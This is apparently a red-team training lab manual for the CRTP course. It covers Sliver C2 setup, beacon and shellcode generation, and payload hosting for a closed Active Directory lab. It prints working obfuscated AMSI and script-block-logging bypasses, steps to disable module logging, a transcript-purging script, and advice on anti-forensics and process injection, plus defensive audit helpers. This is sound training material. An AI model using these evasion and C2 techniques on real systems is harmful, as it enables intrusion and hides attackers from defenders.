LabManual Sliver


CRTP Bootcamp with Sliver

Table of Contents
Introduction ........................................................................................................... 7
What is Sliver ............................................................................................................................................ 7
Features .................................................................................................................................................... 8
Dependencies ........................................................................................................................................... 8

Objective................................................................................................................ 9
Lab objective............................................................................................................................................. 9
Lab Prerequisites ...................................................................................................................................... 9

C2 and Attack Infrastructure ................................................................................ 11


Lab Defenses and Bypasses .................................................................................................................... 11
PSReadline Command History ............................................................................................................ 11
Script Block Logging............................................................................................................................ 11
Module Logging .................................................................................................................................. 12
System-Wide Transcription ................................................................................................................ 13
AntiMalware Scan Interface (AMSI) and Defender ............................................................................ 14
Automating PowerShell bypasses using Invisi-Shell........................................................................... 14
Sliver C2 Lab infrastructure .................................................................................................................... 16
Sliver C2 Setup.................................................................................................................................... 16
Beacon Operations ................................................................................................................................. 18
Process Injection and PPID selection ................................................................................................. 18
Tool execution .................................................................................................................................... 19
Enumeration using LDAP queries ....................................................................................................... 19

Foothold .............................................................................................................. 21
Using Process Injection to invoke shellcode remotely ....................................................................... 21
Analysis using Process Hacker ............................................................................................................ 23

Learning Objective 1 ............................................................................................ 24


Enumerating Users ................................................................................................................................. 24
Using StandIn ..................................................................................................................................... 24
Analysis using Process Hacker ............................................................................................................ 30
Using ADSearch .................................................................................................................................. 31

AlteredSecurity Attacking and Defending Active Directory 1


Enumerating Computers ........................................................................................................................ 33
Using StandIn ..................................................................................................................................... 33
Using ADSearch .................................................................................................................................. 34
Enumerating Domain Administrators ..................................................................................................... 35
Using StandIn ..................................................................................................................................... 35
Using ADSearch .................................................................................................................................. 36
Enumerating Enterprise Administrators ................................................................................................. 37
Using StandIn ..................................................................................................................................... 37
Using ADSearch .................................................................................................................................. 38

Learning Objective 2 ............................................................................................ 39


List all the OUs ........................................................................................................................................ 39
Using StandIn ..................................................................................................................................... 39
Using ADSearch .................................................................................................................................. 41
Enumerate DistinguishedName for StudentMachines OU ..................................................................... 42
Using StandIn ..................................................................................................................................... 42
Using ADSearch .................................................................................................................................. 43
List all the computers in the StudentMachines OU ................................................................................ 44
Using DSQuery.................................................................................................................................... 44
List the GPOs........................................................................................................................................... 46
Using StandIn ..................................................................................................................................... 46
Using ADSearch .................................................................................................................................. 47
Enumerate GPOs applied on the StudentMachines OU ......................................................................... 48
Using StandIn ..................................................................................................................................... 48
Using ADSearch .................................................................................................................................. 49

Learning Objective 3 ............................................................................................ 50


ACL for the Domain Admins group ......................................................................................................... 50
Using ADCollector............................................................................................................................... 50
All modify rights/permissions for studentX ............................................................................................ 52
Using ADCollector............................................................................................................................... 52

Learning Objective 4 ............................................................................................ 53


Enumerate all domains in the moneycorp.local forest .......................................................................... 53

Using DSQuery.................................................................................................................................... 53
Map the trusts of the dollarcorp.moneycorp.local domain ................................................................... 54
Using ADSearch .................................................................................................................................. 54
Map External trusts in moneycorp.local forest ...................................................................................... 55
Using ADSearch .................................................................................................................................. 55
Identify external trusts of dollarcorp domain ........................................................................................ 57
Using ADSearch .................................................................................................................................. 57
Enumerate Trusts of a trusting forest .................................................................................................... 58
Using ADSearch .................................................................................................................................. 58

Learning Objective 5 ............................................................................................ 59


Enumerating the vulnerable service....................................................................................................... 59
Using SharpUp .................................................................................................................................... 59
Using Seatbelt and Stracciatella ......................................................................................................... 61
Elevate privileges to local administrator ................................................................................................ 63
Using Remote-sc-* ............................................................................................................................. 63
Identify where studentX has local administrative access....................................................................... 67
Using LACheck .................................................................................................................................... 67
Command Execution using WMI ........................................................................................................ 68
Command Execution using Winrm ..................................................................................................... 71
Lateral Movement using Sa-sc-enum and Scshell .............................................................................. 71
Abuse Jenkins to get admin access on the dcorp-ci server .................................................................... 74
Using Process Injection to invoke remote shellcode ......................................................................... 74

Learning Objective 6 ............................................................................................ 82


BloodHound Enumeration ...................................................................................................................... 82
Using SharpHound.exe ....................................................................................................................... 82
Using LACheck .................................................................................................................................... 86
Issue with Derivate Local Admin and BloodHound 4.2.0 ................................................................... 88
Identify where studentX has local administrative access....................................................................... 89

Learning Objective 7 ............................................................................................ 90


Identify a Domain Admin session ........................................................................................................... 90
Using LACheck .................................................................................................................................... 90

Escalate privileges to Domain Admin: using dcorp-ci............................................................................. 92
Using Remote-sc-*, Sa-sc-enum, Scshell and PEzor ........................................................................... 92
Escalate privileges to Domain Admin: via derivative admin ................................................................ 101
Using scshell, PEzor & Rubeus .......................................................................................................... 101

Learning Objective 8 .......................................................................................... 105


Extract secrets from the domain controller of dollarcorp.................................................................... 105
Using PEzor, Rubeus and Remote-sc-*............................................................................................. 105
Create and abuse a Golden ticket ........................................................................................................ 111
Using PEZor and Rubeus................................................................................................................... 111

Learning Objective 9 .......................................................................................... 116


Command execution on dcorp-dc via HOST service............................................................................. 116
Using Rubeus, PEzor and Sa-schtasksenum ..................................................................................... 116
Command execution on dcorp-dc via WMI service.............................................................................. 118
Using Rubeus and sharp-wmi ........................................................................................................... 118

Learning Objective 10 ........................................................................................ 120


Execute the Diamond Key attack .......................................................................................................... 120
Using Rubeus .................................................................................................................................... 120

Learning Objective 11 ........................................................................................ 122


Abuse the DSRM credential for persistence ......................................................................................... 122
Using PEzor, and Remote-sc-* ......................................................................................................... 122

Learning Objective 12 ........................................................................................ 128


Check if studentX has DCSync rights .................................................................................................... 128
Using StandIn ................................................................................................................................... 128
Add DCSync rights for studentX and execute the attack ...................................................................... 129
Using StandIn and PEzor................................................................................................................... 129

Learning Objective 13 ........................................................................................ 133


Modify security descriptors on dcorp-dc to get access using PSRemoting and WMI .......................... 133
Using PS2EXE, Sharp-wmi, RACE and Stracciatella........................................................................... 133
Execute a Silver Ticket attack to get code execution with WMI .......................................................... 138
Using RACE, PS2EXE, Rubeus and Sharp-WMI ................................................................................. 138

Learning Objective 14 ........................................................................................ 143
Perform the Kerberoast attack ............................................................................................................. 143
Using StandIn, Rubeus and Hashcat ................................................................................................. 143

Learning Objective 15 ........................................................................................ 146


Find a server where Unconstrained Delegation is enabled.................................................................. 146
Using StandIn ................................................................................................................................... 146
Using ADSearch ................................................................................................................................ 147
Compromise the server and escalate to Domain Admin privileges ..................................................... 148
Using SharpSecDump, Rubeus, LACheck, SpoolSample and Scshell ................................................ 148
Escalation to Enterprise Admins ........................................................................................................... 155
Using Rubeus, SpoolSample, PEzor and Scshell ............................................................................... 155

Learning Objective 16 ........................................................................................ 158


Constrained Delegation user enumeration .......................................................................................... 158
Using StandIn ................................................................................................................................... 158
Using ADSearch ................................................................................................................................ 159
Constrained Delegation user abuse...................................................................................................... 160
Using Rubeus .................................................................................................................................... 160
Constrained Delegation computer enumeration ................................................................................. 162
Using StandIn ................................................................................................................................... 162
Using ADSearch ................................................................................................................................ 163
Constrained Delegation computer abuse ............................................................................................. 164
Using Rubeus .................................................................................................................................... 164

Learning Objective 17 ........................................................................................ 166


Enumerate a Computer Object with Write permissions ...................................................................... 166
Using StandIn ................................................................................................................................... 166
Using Get-RBCD-Threaded ............................................................................................................... 167
Abuse a Computer Object with Write permissions .............................................................................. 168
Using StandIn, PEzor, Rubeus........................................................................................................... 168

Learning Objective 18 ........................................................................................ 174


Escalate to Enterprise Admin using the domain trust key ................................................................... 174
Using PEzor & Rubeus ...................................................................................................................... 174

Learning Objective 19 ........................................................................................ 180
Escalate privileges to Enterprise Admin using krbtgt hash .................................................................. 180
Using PEzor and Rubeus ................................................................................................................... 180

Learning Objective 20 ........................................................................................ 184


Access the SharedwithDCorp share on eurocorp.local ........................................................................ 184
Using PEzor, Sa-Netshares, & Rubeus .............................................................................................. 184

Learning Objective 21 ........................................................................................ 189


Enumerating AD CS ............................................................................................................................... 189
Using Certify ..................................................................................................................................... 189
Privilege Escalation to DA and EA using ESC1....................................................................................... 191
Using Certify, Openssl and Rubeus .................................................................................................. 191
Privilege Escalation to DA and EA using ESC3....................................................................................... 197
Using Certify, Openssl and Rubeus .................................................................................................. 197

Learning Objective 22 ........................................................................................ 204


Enumerating SQL Server and Links................................................................................................... 204
Using SharpSQL ................................................................................................................................ 204
Exploiting SQL Server links.................................................................................................................... 208
Using PS2EXE, PowerUpSQL ............................................................................................................. 208

Resources and Tools .......................................................................................... 211


Closing Note....................................................................................................... 213

Introduction
What is Sliver
Sliver is an open-source, command-line Command and Control (C2) framework built for adversary
simulation. Sliver implants support multiple architectures and operating systems, and the server
supports several egress C2 callback protocols, including DNS, mTLS, WireGuard and HTTP(S).
Its multiplayer mode allows several operators to command the same C2 server simultaneously. Sliver
is also actively updated, maintained and contributed to by the community.

To understand Sliver further refer to its official documentation here.

“Bred as living shields, these slivers have proven unruly-they know they cannot be caught.”

Features

• Dynamic code generation
• Compile-time obfuscation
• Multiplayer-mode
• Staged and Stageless payloads
• Procedurally generated C2 over HTTP(S)
• DNS canary blue team detection
• Secure C2 over mTLS, WireGuard, HTTP(S), and DNS
• Fully scriptable using JavaScript/TypeScript or Python
• Windows process migration, process injection, user token manipulation, etc.
• Let’s Encrypt integration
• In-memory .NET assembly execution
• COFF/BOF in-memory loader
• TCP and named pipe pivots

Dependencies
The Sliver authors recommend running the Sliver server on Linux/macOS (any OS except Windows), so
ideally we use a Linux machine; this lab uses Kali Linux.
Recommended (optional) dependencies are mingw-w64 and Metasploit, which are needed to use all
capabilities of the Sliver C2.

Objective
Lab objective
The goal of this lab manual is to operate with the Sliver C2 in the CRTP lab. We perform all lab tasks with
a good sense of endpoint OPSEC by avoiding the usage of PowerShell directly, bypassing lab defenses
and performing in-memory execution. We will utilize some new/latest tools for various activities such as
Enumeration, Lateral Movement, etc.

Lab Prerequisites
Use a web browser or the OpenVPN client to connect to the lab. See the “Connecting to lab” document
for more details.

All the tools used in the course are available in C:\AD\Tools on your foothold machine. Feel free to
upload and test out tools of your choice.

There is no internet access except to https://portal.azure.com/ to avoid deliberate or accidental
misuse.

The lab manual uses placeholders for user-specific resources. For example, if you see studentx and your
user ID is student25, read studentx as student25, and so on.
PPIDs/PIDs differ on each lab machine and may change on every startup, so choose the target for Process
Injection accordingly.

Reboot the Foothold VM to try a quick fix if you find issues while performing ticket-based attacks using
tools like Rubeus.

Some tools may not produce the desired output because of prior impersonation attacks; spawn new Sliver
sessions to avoid such issues.

Note the following details before you begin the lab:

• Foothold VM: dcorp-stdX -- 172.16.100.X
• Foothold User: dcorp\studentX

Except for the foothold machine dcorp-stdx, all machines in the lab are reverted daily to their original
known state. Make sure to save all your notes offline.

Windows Subsystem for Linux - WSL Ubuntu Core 20.04 is installed on dcorp-stdx to simulate Sliver
operations from Linux.

While copying code / commands from the lab manual, be sure to replace usernames, AES / RC4 keys etc.
in accordance with your lab instance. To copy content, use the standard CTRL + C; to paste, try CTRL + V
or right-click (the WSL Ubuntu app requires a right-click to paste).

Use this credential (WSLToTh3Rescue!) if there is a need to escalate to root on dcorp-stdx – Ubuntu WSL.

WSL Ubuntu can be spawned from the Windows Terminal or the Ubuntu WSL app as follows.
• Spawn WSL using Ubuntu App: (Try Right Click to Paste clipboard)
• Spawn Ubuntu WSL from Windows Terminal: (Try CTRL + V to Paste clipboard)

NOTE: Since WSL is installed and sudo privileges are provided, WSL can be abused for privilege escalation
on dcorp-stdx. However, since AD abuse is the primary focus of this course, we disregard this escalation
path.

C2 and Attack Infrastructure
Lab Defenses and Bypasses
PSReadline Command History
The PSReadline module has shipped with PowerShell for a long time now. Among other things, it gives
users a Unix-like command-line experience, including command history search with CTRL + R, and it
stores command history in a file for reuse between sessions. That file is a forensic artifact of every
command physically typed at the console, and the logging is easily bypassed.

Run Get-PSReadlineOption and note the HistorySavePath property value. This file contains the
PowerShell command history.
PS C:\> (Get-PSReadlineOption).HistorySavePath

C:\Users\studentX\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

To search for a pattern across the history files of all users, run the following command in an elevated shell.
PS C:\> Select-String -Path C:\Users\*\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\*.txt -Pattern 'mimikatz'

Bypass PSReadline by removing its functionality using the following command for the current session.
PS C:\> Remove-Module PSReadline

An alternative would be to edit the ConsoleHost_history.txt file, removing or altering only the entries for
the malicious activity performed, and then use a tool like SharpStomp to timestomp the file back to its
original modified date.

Script Block Logging
Script block logging logs contents of all the script blocks processed by the PowerShell engine regardless
of the host used. Longer scripts will be split between multiple 4104 events with the same ScriptBlock ID.
If you enable Invocation Logging, then 4105 will indicate the beginning of a session and 4106 the end of
a session. Due to the logging volume Invocation Logging is usually not enabled.

We can use either Windows Event Viewer or PowerShell to check whether the Add-Type command can be
found in the Microsoft-Windows-PowerShell/Operational log under event ID 4104.
PS C:\> Get-WinEvent -LogName 'Microsoft-Windows-PowerShell/Operational' -FilterXPath '*[System[(EventID=4104)]]' -MaxEvents 5 | Format-Table TimeCreated, Message -Wrap

To Bypass Script Block logging, we can use the following one-liner:

PS C:\> [Reflection.Assembly]::"l`o`AdwIThPa`Rti`AlnamE"(('S'+'ystem'+'.C'+'ore'))."g`E`TTYPE"(('Sys'+'tem.Di'+'agno'+'stics.Event'+'i'+'ng.EventProv'+'i'+'der'))."gET`FI`eLd"(('m'+'_'+'enabled'),('NonP'+'ubl'+'ic'+',Instance'))."seTVa`l`Ue"([Ref]."a`sSem`BlY"."gE`T`TyPE"(('Sys'+'tem'+'.Mana'+'ge'+'ment.Aut'+'o'+'mation.Tracing.'+'PSEtwLo'+'g'+'Pro'+'vi'+'der'))."gEtFIe`Ld"(('e'+'tw'+'Provid'+'er'),('N'+'o'+'nPu'+'b'+'lic,Static'))."gE`Tva`lUe"($null),0)

As before, this works only for the current session.

Execute the sbloggingbypass.ps1 one-liner and verify that the bypass works after execution as follows.
PS C:\> C:\AD\Tools\sbloggingbypass.ps1
PS C:\> Get-WinEvent -FilterHashtable @{ProviderName="Microsoft-Windows-PowerShell"; Id=4104} | Measure | % Count
6

# Test Command that generates a 4104 event
PS C:\> Get-Module -ListAvailable | Format-Table Name, LogPipelineExecutionDetails

PS C:\> Get-WinEvent -FilterHashtable @{ProviderName="Microsoft-Windows-PowerShell"; Id=4104} | Measure | % Count
6

Module Logging
Module logging was introduced in Windows PowerShell 3.0 and logs pipeline execution and command
execution events. It is entirely dictated by the LogPipelineExecutionDetails property of each module.

Module logging appears in two places; we focus on PowerShell 5.0:

PowerShell 5.0:
PS C:\> Get-WinEvent -LogName "Windows PowerShell"
While enumerating PowerShell event logs, we notice that modules have a property called
LogPipelineExecutionDetails, which is set to False by default; the ones set to True have module
logging enabled.
PS C:\> Get-Module -ListAvailable | Format-Table Name, LogPipelineExecutionDetails

Name LogPipelineExecutionDetails
---- ---------------------------
Microsoft.PowerShell.Operation.Validation False
PackageManagement False
Pester False
PowerShellGet False

[.......snip......]

To bypass module logging we set LogPipelineExecutionDetails to false on the modules that have it enabled. Some cmdlets, such as Get-Command, come from the Microsoft.PowerShell.Core snap-in, which modern Windows PowerShell still uses, so the snap-in needs the same treatment (Get-PSSnapin exists only in Windows PowerShell, not in PowerShell 7). To disable module logging for the core PowerShell commands, run the following:
PS C:\> Get-WinEvent -LogName "Windows PowerShell" | Measure | % Count
7
PS C:\> $module = Get-Module Microsoft.PowerShell.Utility
PS C:\> $module.LogPipelineExecutionDetails = $false
PS C:\> $Snapin = Get-PSSnapin Microsoft.PowerShell.Core
PS C:\> $Snapin.LogPipelineExecutionDetails = $false

# Test command for module logging
PS C:\> Get-Command
PS C:\> Get-WinEvent -LogName "Windows PowerShell" | Measure | % Count
7

The count is unchanged after the test command: no additional module logging events (4103 in the Operational log, 800 in the classic log) were written. As with the other bypasses this only affects the current session.

System-Wide Transcription
The Start-Transcript cmdlet enables transcription (console logging) for everything that uses the PowerShell engine (the System.Management.Automation namespace/dll): powershell.exe, PowerShell ISE and custom hosts such as .NET DLLs, msbuild, installutil etc. Windows PowerShell 5.0 introduced nested and system-wide transcription. The policy automatically records all commands and their output into log files in a directory that you specify; the directory is created automatically if it does not exist.

A threat actor could simply delete transcript files to cover their tracks if the log path isn't obscure and there are no access controls hardening the path (a write-only share or directory, where users can append but not read or delete, is the usual mitigation).

Here is a snippet to read the transcription output path from the registry and purge all transcript files.
PS C:\> $basePath = "HKLM:\Software\Policies\Microsoft\Windows\PowerShell\Transcription"
if (Test-Path $basePath) {
    $a = Get-ItemProperty $basePath -Name OutputDirectory | Select-Object -ExpandProperty OutputDirectory
    if (!$?) { 'Not Configured' } else {
        if (Test-Path -Path $a) {
            Get-ChildItem -Path $a -Recurse | Remove-Item -Force -Confirm:$false -Recurse
        } else {
            'Log path not found.'
        }
    }
} else {
    'Not Configured'
}

An alternative would be to edit the transcript files, removing or altering only the malicious activity, and then use a tool like SharpStomp to timestomp each file back to its original modified date.
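
Before picking a bypass it helps to know which of the three logging features is actually enforced, and whether the transcript directory is hardened as described above. The following audit helper is an added example (not from the lab manual or AlteredSecurity tooling); the registry paths are the standard Group Policy locations, and the probe file name used for the write/delete test is an assumption.

```powershell
# Added example (not from the lab manual): enumerate the PowerShell logging policies the
# bypasses above target, and probe whether the transcript directory can be tampered with.
function Get-PSLoggingPolicy {
    $base = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'

    # Read one policy value; $null when the key or value is not configured.
    $read = {
        param([string]$SubKey, [string]$Name)
        $key = Join-Path $base $SubKey
        if (Test-Path $key) { (Get-ItemProperty -Path $key -Name $Name -ErrorAction SilentlyContinue).$Name }
    }

    # Module logging lists modules as value names under ModuleNames ('*' = everything).
    $moduleNames = @()
    $mnKey = Join-Path $base 'ModuleLogging\ModuleNames'
    if (Test-Path $mnKey) { $moduleNames = @((Get-Item $mnKey).GetValueNames()) }

    $transcriptDir = & $read 'Transcription' 'OutputDirectory'

    [pscustomobject]@{
        ScriptBlockLogging  = [bool](& $read 'ScriptBlockLogging' 'EnableScriptBlockLogging')
        InvocationLogging   = [bool](& $read 'ScriptBlockLogging' 'EnableScriptBlockInvocationLogging')
        ModuleLogging       = [bool](& $read 'ModuleLogging' 'EnableModuleLogging')
        ModuleLoggingNames  = $moduleNames
        Transcription       = [bool](& $read 'Transcription' 'EnableTranscripting')
        TranscriptDirectory = $transcriptDir
        TranscriptDirAccess = Test-DirectoryTamperable -Path $transcriptDir
    }
}

function Test-DirectoryTamperable {
    # 'create+delete': a user can drop and remove files, so transcripts are purgeable.
    # 'create-only'  : the hardened write-only configuration.  'no-create': no write access.
    param([string]$Path)
    if (-not $Path -or -not (Test-Path -LiteralPath $Path)) { return 'not-present' }
    $probe = Join-Path $Path ([guid]::NewGuid().ToString('N') + '.tmp')   # probe name is arbitrary
    try { [IO.File]::WriteAllText($probe, 'probe') } catch { return 'no-create' }
    try { Remove-Item -LiteralPath $probe -Force -ErrorAction Stop; 'create+delete' } catch { 'create-only' }
}

function Get-SessionModuleLogging {
    # The in-session flags that the module logging bypass above flips to $false.
    $items = @(Get-Module)
    if (Get-Command Get-PSSnapin -ErrorAction SilentlyContinue) { $items += @(Get-PSSnapin) }   # Windows PowerShell only
    $items | Select-Object Name, LogPipelineExecutionDetails
}

# Usage:
# Get-PSLoggingPolicy | Format-List
# Get-SessionModuleLogging | Where-Object LogPipelineExecutionDetails
```

The registry view shows what policy demands; Get-SessionModuleLogging shows what the current process is actually doing, which is what the in-memory bypasses change. A defender reviewing the output wants Transcription enabled with TranscriptDirAccess reporting 'create-only'.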

Antimalware Scan Interface (AMSI) and Defender

Microsoft Defender is the antivirus component of Microsoft Windows. It mainly uses static signatures and heuristic analysis to alert on malicious files on disk.

The Antimalware Scan Interface (AMSI) lets applications and services integrate with the registered antimalware product. It allows detection of malicious scripts regardless of input method (disk, -EncodedCommand, in-memory), because the registered antivirus gets access to the content of a script before it executes. Detections are written to the Microsoft-Windows-Windows Defender/Operational log with event IDs 1116 (malware detected) and 1117 (action taken).

Using either Windows Event Viewer or, in this case, PowerShell, we can find flagged content such as the Invoke-Mimikatz command in the Microsoft-Windows-Windows Defender/Operational log under event IDs 1116 or 1117.
PS C:\> Get-WinEvent -LogName 'Microsoft-Windows-Windows Defender/Operational' -FilterXPath "*[System[((EventID=1116) or (EventID=1117))]]" -MaxEvents 5 | Format-Table TimeCreated, Message -Wrap

We should use an AMSI bypass that is itself not detected by Defender. Useful sources are Amsi-Bypass-Powershell and amsi.fail. We can obfuscate the original AMSI bypass script with tools such as Invoke-Obfuscation and chameleon to evade signatures. During the lab we use the following obfuscated bypass; once de-obfuscated it sets the static amsiInitFailed field of System.Management.Automation.AmsiUtils to true, after which the engine skips AMSI scanning for the session.
PS C:\> S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
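
To confirm that a bypass like the one above actually took effect, rather than inferring it from the absence of a Defender alert, here is an added PowerShell check (not part of the manual): it evaluates Microsoft's documented AMSI test string, which a live AMSI provider blocks, and reports whether amsi.dll is mapped into the process (the Process Hacker "Modules" check the manual performs by hand).

```powershell
# Added example (not the lab's code): test whether AMSI is scanning this PowerShell session.
function Test-AmsiActive {
    # Concatenated at runtime so the file on disk does not itself carry the test signature.
    $sample = 'AMSI Test Sample: ' + '7e72c3ce-861b-4339-8740-0ac1484c1386'
    try {
        # Evaluate the sample as a string literal; AMSI inspects the script text before it runs.
        $null = Invoke-Expression "'$sample'"
        $false      # ran unhindered: AMSI is not scanning (disabled, no provider, or bypassed)
    } catch {
        # Defender surfaces the block as a parse error carrying this message.
        if ($_.Exception.Message -match 'malicious content') { $true } else { throw }
    }
}

function Get-AmsiModuleState {
    # Whether amsi.dll is loaded into the current process and where.
    $mod = (Get-Process -Id $PID).Modules | Where-Object { $_.ModuleName -ieq 'amsi.dll' }
    [pscustomobject]@{
        Loaded      = [bool]$mod
        BaseAddress = if ($mod) { '0x{0:X}' -f $mod.BaseAddress.ToInt64() } else { $null }
    }
}

# Usage: run before and after the bypass one-liner above.
# Test-AmsiActive        # $true while AMSI is live, $false after a working bypass
# Get-AmsiModuleState    # amsi.dll stays loaded after the AmsiUtils bypass; only the scanning stops
```

Running Test-AmsiActive while AMSI is live writes a 1116/1117 detection for the test sample, so it is a lab verification step rather than something to run on a real target. The module check is the reason Get-AmsiModuleState exists alongside it: the amsiInitFailed bypass leaves amsi.dll loaded, so "is the DLL present" and "is scanning happening" are different questions.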

Automating PowerShell bypasses using Invisi-Shell

Invisi-Shell is a tool that bypasses AMSI, script block logging, system-wide transcription and module logging at startup by hooking the .NET assemblies of the PowerShell engine. It performs the PowerShell bypasses above in an easier, automated fashion.

Run either of the batch files depending on whether you have local administrator privileges: RunWithPathAsAdmin.bat (admin) or RunWithRegistryNonAdmin.bat (non-admin).
# Using non-admin privileges
PS C:\> C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat

# Using admin privileges
PS C:\> C:\AD\Tools\InviShell\RunWithPathAsAdmin.bat

Sliver C2 Lab infrastructure
For this lab we set up Sliver on WSL, using version v1.5.41 from the official release page.

All that is needed to host Sliver is the sliver-server_linux (C2 server) and sliver-client_linux (C2 multiplayer client) binaries.

The student VM (dcorp-stdX) is the initial foothold (assumed breach scenario) and is used to pivot to other machines.

Only dcorp-stdX connects back to the Sliver C2 over HTTPS; all other lab machines send their C2 traffic to dcorp-stdX via TCP pivots, which relay it over the foothold's HTTPS channel to the Sliver C2.

Sliver C2 Setup
Sliver has been downloaded and is located at C:\AD\Tools\Sliver. Corresponding Defender Exceptions
have been added for successful compilation of beacons and implants.

Spawn a WSL Ubuntu prompt and execute the sliver-server_linux binary to start the Sliver C2 server.
wsluser@dcorp-studentX:~$ cd /mnt/c/AD/Tools/Sliver
wsluser@dcorp-studentX:/mnt/c/AD/Tools/Sliver$ sudo ./sliver-server_linux
[sudo] password for wsluser: WSLToTh3Rescue!

Sliver supports multiple egress callback protocols such as mTLS, DNS and HTTPS. In this case we use HTTPS for egress callbacks. Start an HTTPS listener on port 443 for C2 traffic.

NOTE: It is possible to use custom certificates for the HTTPS listener. List active egress listeners using the jobs command.

[server] sliver > https

[*] Starting HTTPS :443 listener ...
[*] Successfully started job #2

Generate an HTTPS Portable Executable (exe) beacon with basic obfuscation features enabled (-e).
[server] sliver > generate beacon -b https://172.16.100.X -e -f exe -N dcorp-std_https

[*] Generating new windows/amd64 beacon implant binary (1m0s)
[*] Symbol obfuscation is enabled
[*] Build completed in 2m0s
[*] Implant saved to /mnt/c/AD/Tools/Sliver/dcorp-std_dcorp-std_https.exe

generate:
-e: enable evasion features
-b: http(s) connection strings

-f: Specifies the output formats
-N: Agent name

Similarly, generate HTTPS beacon shellcode with basic obfuscation features enabled.
[server] sliver > generate beacon -b https://172.16.100.X -e -f shellcode -N dcorp-std_https

[*] Generating new windows/amd64 beacon implant binary (1m0s)
[*] Symbol obfuscation is enabled
[*] Build completed in 00:00:38
? Encode shellcode with shikata ga nai? Yes
[*] Encoding shellcode with shikata ga nai ... success!
[*] Implant saved to /mnt/c/AD/Tools/Sliver/dcorp-std_dcorp-std_https.bin

Set up a python3 (or HFS) web server on port 80 from a new Ubuntu prompt to deliver tools, shellcode and payloads into the target environment from /mnt/c/AD/Tools/Sliver.
wsluser@dcorp-studentX:~$ cd /mnt/c/AD/Tools/Sliver
wsluser@dcorp-studentX:/mnt/c/AD/Tools/Sliver$ sudo python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

Beacon Operations
Process Injection and PPID selection
Sliver supports a variety of process injection methods, including execute-assembly, which uses the fork-and-run technique: spawn a new sacrificial process, inject the post-exploitation code into it, execute it, and kill the process when finished. This lets external tools such as StandIn run in the memory of seemingly benign processes. We will use these methods to execute C#/.NET tooling in memory throughout the lab.

Commonly abused processes for process injection are as follows.


• lsass.exe (credential theft)
• calc.exe (evasion)
• notepad.exe (evasion)
• svchost.exe (evasion)
• backgroundtaskhost.exe (application control bypass)
• dllhost.exe (commonly used to host COM components, adversaries often inject into this process in
order to blend in to a process that executes often and is expected to have a short lifetime).
• regsvr32.exe (application control bypass and other evasion)
• searchprotocolhost.exe (application control bypass and other evasion).
• werfault.exe (evasion)
• wuauclt.exe (evasion)
• spoolsv.exe (evasion)

PPID spoofing is a technique that lets an attacker start a program with an arbitrary parent process. It makes the program appear to have been spawned by a different process than the one that actually created it, which helps evade detections based on parent/child process relationships.

• Illegitimate and unlikely parent/child relationships help defenders: for example, WINWORD.exe spawning rundll32.exe or cmd.exe is suspicious and a potential IOC.

• We can abuse legitimate parent/child relationships to blend in and stay hidden for better OPSEC. Analyzing with Process Hacker we see a common legitimate relationship in which svchost.exe launches RuntimeBroker.exe, sihost.exe, taskhostw.exe, SearchUI.exe etc. We impersonate such relationships when executing our injection tasks.

Tool execution
Sliver has in-built modules for common beacon tasks and exploitation. Apart from these, Sliver has an armory from which commonly used exploitation tools can be downloaded and used as in-built commands/modules.

Any other external tool that is a .NET assembly can be executed via execute-assembly or inline-execute-assembly (not every .NET assembly is compatible).

execute-assembly supports both remote process injection via fork and run, with PPID spoofing of the sacrificial process, and self-process injection into the current implant. Self-process injection supports the in-built AMSI and ETW bypasses.

inline-execute-assembly was created mainly for self-process injection, i.e. to avoid the fork-and-run technique altogether.

Enumeration using LDAP queries

Parts of the domain enumeration process are performed using raw LDAP queries. To understand LDAP queries and their syntax, see this Microsoft article:
https://social.technet.microsoft.com/wiki/contents/articles/5392.active-directory-ldap-syntax-filters.aspx
Here is a useful cheat sheet for the most popular LDAP queries and syntax:
https://gist.github.com/jonlabelle/0f8ec20c2474084325a89bc5362008a7
Under the hood most tools issue LDAP queries, and understanding them helps with Active Directory enumeration and exploitation; it also lets you write custom LDAP searches when needed.

Since PowerView/SharpView are widely signatured today, a suitable replacement for most of their enumeration functionality is a tool that supports custom LDAP queries, such as StandIn or ADSearch.

A good way to learn which LDAP queries a tool performs is to turn on its verbosity flag and read the queries it issues, for example:
[server] sliver (dcorp-std_https) > execute-assembly -t 80 '/mnt/c/AD/Tools/SharpView.exe' 'Get-DomainSID -verbose'

[*] Output:
[Get-DomainSearcher] search base: LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=DOLLARCORP,DC=MONEYCORP,DC=LOCAL
[Get-DomainComputer] Using additional LDAP filter: (userAccountControl:1.2.840.113556.1.4.803:=8192)
[Get-DomainComputer] Get-DomainComputer filter string: (&(samAccountType=805306369)(userAccountControl:1.2.840.113556.1.4.803:=8192))

S-1-5-21-1874506631-3219952063-538504511

NOTE: Any tool that fires many LDAP queries in quick succession will raise alerts in protections such as Microsoft Defender for Identity (MDI) and Defender ATP. On a real engagement, spread such enumeration over long time intervals.

Foothold
Using Process Injection to invoke shellcode remotely
Assuming we have access to the foothold VM dcorp-stdX (172.16.100.X) via assumed breach, we leverage Sliver on the same machine to gain a foothold beacon.

We can use a PE loader to perform process injection into a target process by downloading and invoking remotely hosted shellcode. We use a dropper called NtDropper (currently closed source) that leverages Nt* APIs to avoid detections, with the previously generated dcorp-std_https.bin shellcode hosted on the python3/HFS web server.

Execution flow: NtDropper --> fetch shellcode --> process injection

Begin by using NtDropper to invoke the locally hosted shellcode as follows.
PS C:\AD\Tools> C:\AD\Tools\NtDropper.exe
Usage: <IP or H0stname> <sh3llcod3>

